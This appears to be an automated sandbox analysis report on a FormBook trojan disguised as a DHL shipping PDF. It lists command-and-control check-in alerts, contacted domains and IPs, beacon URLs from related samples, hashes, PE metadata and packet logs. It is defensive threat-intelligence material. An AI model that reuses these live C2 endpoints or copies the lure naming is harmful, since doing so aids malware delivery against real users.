52.58.78.16	www.thera.xyz	United States	16509	AMAZON-02US	true
104.21.5.62	www.anushreehomemadeproducts.online	United States	13335	CLOUDFLARENETUS	true
34.102.136.180	dependablelawnsnow.com	United States	15169	GOOGLEUS	false
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
178.254.0.81	www.lighterthanlight.net	Germany	42730	EVANZOASDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491716
Start date:	27.09.2021
Start time:	20:33:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 44s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DHL AWB# 4AB19037XXX.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@12/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 63.2% (good quality ratio 58%) Quality average: 72.2% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 86% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.82.209.183, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 20.199.120.182, 20.54.110.249, 40.112.88.60, 20.82.210.154, 20.199.120.85 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:37:05	API Interceptor	1x Sleep call for process: DHL AWB# 4AB19037XXX.pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.58.78.16	SUPPLY_PRICE_ORDER_9978484DF.exe	Get hash	malicious	Browse	www.yota.store/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA==
	NEW ORDER RE PO88224.PDF.EXE	Get hash	malicious	Browse	www.micomunidadcenter.com/ny9y/?U6kL4z=23/iwRxwSLSzasw0TphUHgWs88I3eSCUV5e0scr20yVXZozDYOBdmM5gaQNr8R72GlgZ&m48Dz=6lU4XF78
	Medical Order 092021.exe	Get hash	malicious	Browse	www.clearthefear.com/u89u/?q6=MN6x-tT086cD&Bv-le4o8=nk6RKoLHD/7U0k5q2Ds7uHLNSYJNsv7YZbE57SdXhp0czLEVViRVtuwEavcEiCpFyhAD
	TNT 07833955.exe	Get hash	malicious	Browse	www.villamante.com/b5ce/?C2M=7yv+sRlAJqST60jDhfTKkVYz9ALetPX59nt/q3NTarObbD6Qp3RvHJttKgbeFsW/Tl/p7rMteA==&2dtd=2dTpyPZX3Tqt_8d0
	ibefrankzx.exe	Get hash	malicious	Browse	www.hellohomeowner.com/if60/?4hV8uV6=8s6KWWR+5oH5p/5kYOTLy7MlSrvYRAsbSz+XGmfA8M0nnzS+NjTChWRYGldrrPF+jR2r&vR-pL=oBZ4BzuxwXzDVX
	payment..exe	Get hash	malicious	Browse	www.simera.xyz/etaf/?7n=Pzrtyx08&lHFx40t=g93QQfEc0y//TzIsdcwzV8qrP5ZvntJQzb0qwPDJTSBww162D9OYPZEA9+I0sjS/dYHN
	La lista de carga.exe	Get hash	malicious	Browse	www.smoothcontract.com/cb3b/?u2=-ZyLOPeH44YdHFMp&g8U=+4YzqtPsAmqZ5oh2OV/3jJxgPTkkCjUYxsix9kU/cx8RL4LCy8xFdT1oIwt5N4+QqzVG
	list.xlsx	Get hash	malicious	Browse	www.gamifibase.com/uytf/?droDtj=4h5xofUhs&m48=CwRnMgJ9dEKezCvlIZg7oborm7R79l5xa+5n2ZgG5sEle5VUrafcSaxshLf6ImIV/hCaMA==
	QUOTATION.exe	Get hash	malicious	Browse	www.opexma.com/tgnd/?b0GXqB=lzutZFupcl&0brhL=Ro5q4gBgYR1Pzna33h87154KGtgPkdNzz9moAL1wG6IIDJ/xcleiJW19OAhFIswNhMjZ
	Remittance_Advice_details001009142021.xlsx	Get hash	malicious	Browse	www.ecofingers.com/dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa
	QUOTATION.exe	Get hash	malicious	Browse	www.virtualvandy.com/m4ts/?KHDXBF=wlFLGUAsp6BDGTS0jQI4z7Znr3dDkQDTTcVdFU/Rey3f2VeaBOrua3jxtl/rZ4AM1efI&tR-DU=ETYX
	PAYMENT COPY 02092021 PDF.exe	Get hash	malicious	Browse	www.totalcateringsolutions.com/nvts/?bL0Xot=UHVDS2sp&o6Aln=eadEcrBkBhUFvNqvPjTp+4BF7ywTZELqHgQMi/+k6oDfgcIaaimiwhKoz7JvDoSHD7EM
	mgUoskhcYw.exe	Get hash	malicious	Browse	www.algoswipe.com/i7dg/?c8DXBtGx=QlwSkxbZadzUeQqQ30CvqyB6rj7s5Q3MCb1zrrX2cqYPaGvNcrPTJxNDLiAhi6vAbY6C&oFNlP=nVnHMzW8Enl4w
	SOA.exe	Get hash	malicious	Browse	www.malikakids.com/bp39/?3fkpkd=4hKTJV&FL=qzkPggjnCd/Vmi+c26VefrYfl/NXi2h+iB46oNAc8jlNjWrHAQrLoO2c1oUjeDtDrMr9
	Alkhalo Trading Specification N0-00180091 pdf.exe	Get hash	malicious	Browse	www.unitedold.com/h388/?AHrxEXhh=HeOxd3fTK3emeSZhIcEHyZUbH5pi5uzRBKaOyXjbbuHI/gxjF5X3QotEpSoKmdp15nJu&v8kDE=KZtLDXk
	wLQpoUtFRW.exe	Get hash	malicious	Browse	www.foodboxprogram.com/hisp/?EtJLUP=mPq+goc2WbnDmv4fbddgDYidLsOkPwzb1ZDdyOKSZuYaGeRjfw+Mm+Zx6e1a6ZRBUbvQ&m8=_6Ax3F7HL65px0pP
	payment details.exe	Get hash	malicious	Browse	www.kumamotors.com/imm8/?m0G0H=WNbJnnYKyXaFNyvqUv7OM8tc6Ip+G1TKO56RrIv1d9VKfxOXYBkfWrW8PXSlo33BkjPg&v0=4h-PAlbPzLHPfRf
	42yTynkXXH.exe	Get hash	malicious	Browse	www.algoswipe.com/i7dg/?TN9=gjiTTXEh9H_&eFQl7bE=QlwSkxbZadzUeQqQ30CvqyB6rj7s5Q3MCb1zrrX2cqYPaGvNcrPTJxNDLhgxtb/4F9TF
	rich.exe	Get hash	malicious	Browse	www.localhistory.uk/angp/?aDKd98=Tqni2fLSXG5mIFQutWn33nbGnah9sr0oZ31AuXOcuD6yn/9oT6+GkOZo4u+Wx4yaERuP&3fuH=1bVdAz0HBbVxO
	Wire-Confirmation.xlsx	Get hash	malicious	Browse	www.mobiessence.com/6mam/?b0D4=KE8gpfUButRuMRaKHV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjCzZMh2LYYHbaIsWTA==&r0DpR=Fvl0dr_Xh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	aQKifdER74.exe	Get hash	malicious	Browse	162.159.133.233
	s9SWgUgyO5.exe	Get hash	malicious	Browse	162.159.133.233
	Original Shipping documents.exe	Get hash	malicious	Browse	162.159.129.233
	Image-Scan-80195056703950029289.exe	Get hash	malicious	Browse	162.159.133.233
	RHgAncmh0E.exe	Get hash	malicious	Browse	162.159.135.233
	InvPixcareer.-43329_20210927.xlsb	Get hash	malicious	Browse	162.159.129.233
	InvPixcareer.-43329_20210927.xlsb	Get hash	malicious	Browse	162.159.130.233
	7kDS0NWm3l.exe	Get hash	malicious	Browse	162.159.130.233
	kzSWxYLY4H.exe	Get hash	malicious	Browse	162.159.133.233
	InvPixcareer.-5589234_20210927.xlsb	Get hash	malicious	Browse	162.159.133.233
	INQUIRY LIST.exe	Get hash	malicious	Browse	162.159.129.233
	YTHK21082400.exe	Get hash	malicious	Browse	162.159.133.233
	Silver_Light_Group_DOC03027321122.exe	Get hash	malicious	Browse	162.159.130.233
	DeKxL6OdiV.exe	Get hash	malicious	Browse	162.159.130.233
	OTKqvzSZfm.exe	Get hash	malicious	Browse	162.159.133.233
	Taskmgr.exe	Get hash	malicious	Browse	162.159.134.233
	SWIFT ADVISE VD20092021.Pdf.exe	Get hash	malicious	Browse	162.159.129.233
	xccHIJ0vo7.exe	Get hash	malicious	Browse	162.159.133.233
	9Fq3K0VfLK.exe	Get hash	malicious	Browse	162.159.134.233
	NEW PRODUCT DETAILS.doc	Get hash	malicious	Browse	162.159.129.233
shops.myshopify.com	COURT-ORDER#S12GF803_zip.exe	Get hash	malicious	Browse	23.227.38.74
	DO526.doc	Get hash	malicious	Browse	23.227.38.74
	Orden specifications_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	DUE PAYMENT.exe	Get hash	malicious	Browse	23.227.38.74
	SBGW#001232021.exe	Get hash	malicious	Browse	23.227.38.74
	678901.exe	Get hash	malicious	Browse	23.227.38.74
	purchase_order_list.exe	Get hash	malicious	Browse	23.227.38.74
	Order Confirmation.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Quotation & Sample Designs.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	125M702vaO.exe	Get hash	malicious	Browse	23.227.38.74
	sprogr.exe	Get hash	malicious	Browse	23.227.38.74
	Cota#U00e7#U00e3o de produto.exe	Get hash	malicious	Browse	23.227.38.74
	Payment Proof pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Statement of Account.exe	Get hash	malicious	Browse	23.227.38.74
	DHL-2622249_210811082342056.exe	Get hash	malicious	Browse	23.227.38.74
	Cotizacin de materiales_PDF.exe	Get hash	malicious	Browse	23.227.38.74
	aT8aer3ybNvYpl3.exe	Get hash	malicious	Browse	23.227.38.74
	cKEuN1Afoi.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	g3WKiTzh4d.exe	Get hash	malicious	Browse	18.139.111.104
	Requirement.vbs	Get hash	malicious	Browse	3.112.173.17
	rrVvnZMcFs	Get hash	malicious	Browse	34.249.145.219
	Inquiry-URGENT.exe	Get hash	malicious	Browse	34.252.217.69
	SUPPLY_PRICE_ORDER_9978484DF.exe	Get hash	malicious	Browse	52.58.78.16
	ZFb3RmLJzo	Get hash	malicious	Browse	184.76.99.170
	N1Cyp2N7r0	Get hash	malicious	Browse	13.244.63.184
	G3kV1FpdsS	Get hash	malicious	Browse	52.31.137.232
	T5BjNBDzJa	Get hash	malicious	Browse	52.49.157.211
	DHL EXPRESS TESL#U0130MAT B#U0130LD#U0130R#U0130M#U0130 - AWB 9420174470.PDF.exe	Get hash	malicious	Browse	75.2.26.18
	Inquiry Order 26-09-2021.exe	Get hash	malicious	Browse	75.2.115.196
	GbjE8Awfrz	Get hash	malicious	Browse	13.239.133.6
	TfaQUm3e4Y	Get hash	malicious	Browse	18.133.169.79
	fmS6YYhBy1	Get hash	malicious	Browse	18.146.208.84
	cropy2.exe	Get hash	malicious	Browse	54.218.102.67
	83Sb5L88ry.exe	Get hash	malicious	Browse	18.139.111.104
	EhB2SUfLy2.exe	Get hash	malicious	Browse	44.227.65.245
	McYFrqRcE3.exe	Get hash	malicious	Browse	18.139.111.104
	sora.arm7	Get hash	malicious	Browse	18.180.172.181
	sora.x86	Get hash	malicious	Browse	13.220.139.156
DEDICATEDTELECOMTR	RBDcJa42oj.exe	Get hash	malicious	Browse	185.15.196.172
	Z210815BBSNKKMC220374.doc	Get hash	malicious	Browse	185.15.196.172
	qEDUvyx5H4.exe	Get hash	malicious	Browse	185.95.2.67

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	aQKifdER74.exe	Get hash	malicious	Browse	162.159.133.233
	s9SWgUgyO5.exe	Get hash	malicious	Browse	162.159.133.233
	GU#U00cdA DE CARGA...exe	Get hash	malicious	Browse	162.159.133.233
	q2D8haqKv5.exe	Get hash	malicious	Browse	162.159.133.233
	TT09876545678T8R456.exe	Get hash	malicious	Browse	162.159.133.233
	Original Shipping documents.exe	Get hash	malicious	Browse	162.159.133.233
	TAX INVOICE_CCU-30408495_00942998_20180910_194738.exe	Get hash	malicious	Browse	162.159.133.233
	RHgAncmh0E.exe	Get hash	malicious	Browse	162.159.133.233
	01_extracted.exe	Get hash	malicious	Browse	162.159.133.233
	INQUIRY LIST.exe	Get hash	malicious	Browse	162.159.133.233
	YTHK21082400.exe	Get hash	malicious	Browse	162.159.133.233
	Taskmgr.exe	Get hash	malicious	Browse	162.159.133.233
	SOA.exe	Get hash	malicious	Browse	162.159.133.233
	SWIFT ADVISE VD20092021.Pdf.exe	Get hash	malicious	Browse	162.159.133.233
	xccHIJ0vo7.exe	Get hash	malicious	Browse	162.159.133.233
	S.O.A.exe	Get hash	malicious	Browse	162.159.133.233
	9Fq3K0VfLK.exe	Get hash	malicious	Browse	162.159.133.233
	LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe	Get hash	malicious	Browse	162.159.133.233
	#U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe	Get hash	malicious	Browse	162.159.133.233
	DHL NOTIFICATIONS.exe	Get hash	malicious	Browse	162.159.133.233

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL AWB# 4AB19037XXX.pdf.exe.log Download File
Process:	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1721
Entropy (8bit):	5.39127362806184
Encrypted:	false
SSDEEP:	48:MxHKEYHKGD8AoPtHTG1hAHKKPF1qHGiD0HKeGxHK3+vxpNT:iqEYqGgAoPtzG1eqKPFwmI0qeoquZPT
MD5:	A25F70EB14E27BADC54BCAAFD471B0D7
SHA1:	BAD9E4E87715827CBE362DF7A94785DC4591A83D
SHA-256:	C08CF4305521B0F463807E849D806B70D7073D70C8C3633AB4E347F041442080
SHA-512:	CD8E23EA50159382090433358A23C7D135333E3E1A13BE01C12136333CBE25C894D5768BD81A0910701A239F5583B8A17AECAD4F4F2EDCBC6C61F8041737725A
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5

Static File Info

General
File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.498824246870166
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DHL AWB# 4AB19037XXX.pdf.exe
File size:	11776
MD5:	690684b6b6a432ef5f8b34b67653d4be
SHA1:	34b072cdd785e0be9bf9717707a72c122ebf8e93
SHA256:	2ea667119c0aeda764dcb53a2adf480a26985bfc682949d0fb0c02d266342c68
SHA512:	b074acee0f6505a1c179af3149bc9146719b0df0bf6f0efa668d611ff388dc36f5cd7ed3c7c8a98317895ef716818ec0c3841ccff96aba0ba5ce8da15c0c6eb5
SSDEEP:	192:vXJJ/3Du6VyVt6TgAgoEwJnWO+Bh72Jkp/dq2bpKyS:hJ/3W6TgAgoEwJnWhzHp/dXpKy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pa.................$..........~B... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40427e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6150D8EB [Sun Sep 26 20:32:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x422c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x4c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x40f4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2284	0x2400	False	0.377495659722	data	4.77728671216	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x4c8	0x600	False	0.368489583333	data	3.66774301738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x60a0	0x234	data
RT_MANIFEST	0x62d8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	0.0.0.0
InternalName	44.exe
FileVersion	0.0.0.0
ProductVersion	0.0.0.0
FileDescription
OriginalFilename	44.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-20:38:29.236493	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
09/27/21-20:38:29.972482	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
09/27/21-20:38:38.427389	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	178.254.0.81
09/27/21-20:38:38.427389	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	178.254.0.81
09/27/21-20:38:38.427389	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	178.254.0.81
09/27/21-20:38:43.515732	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.3	34.102.136.180
09/27/21-20:38:43.515732	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.3	34.102.136.180
09/27/21-20:38:43.515732	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.3	34.102.136.180
09/27/21-20:38:43.696515	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49842	34.102.136.180	192.168.2.3
09/27/21-20:39:04.099948	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49867	23.227.38.74	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 20:36:56.489823103 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.489878893 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:56.489974022 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.525208950 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.525237083 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:56.570045948 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:56.570233107 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.576370001 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.576384068 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:56.576837063 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:56.618324995 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:56.975734949 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015064955 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015183926 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015249968 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015263081 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015608072 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015651941 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015686035 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015698910 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015749931 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015762091 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015775919 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015841961 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015847921 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015861988 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015922070 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.015953064 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.015964031 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.016005993 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.016031027 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.016040087 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.016108990 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019277096 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019365072 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019407988 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019422054 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019438028 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019491911 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019501925 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019556046 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019589901 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019602060 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019613981 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019663095 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019671917 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019730091 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019778967 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019814968 CEST	443	49739	162.159.133.233	192.168.2.3
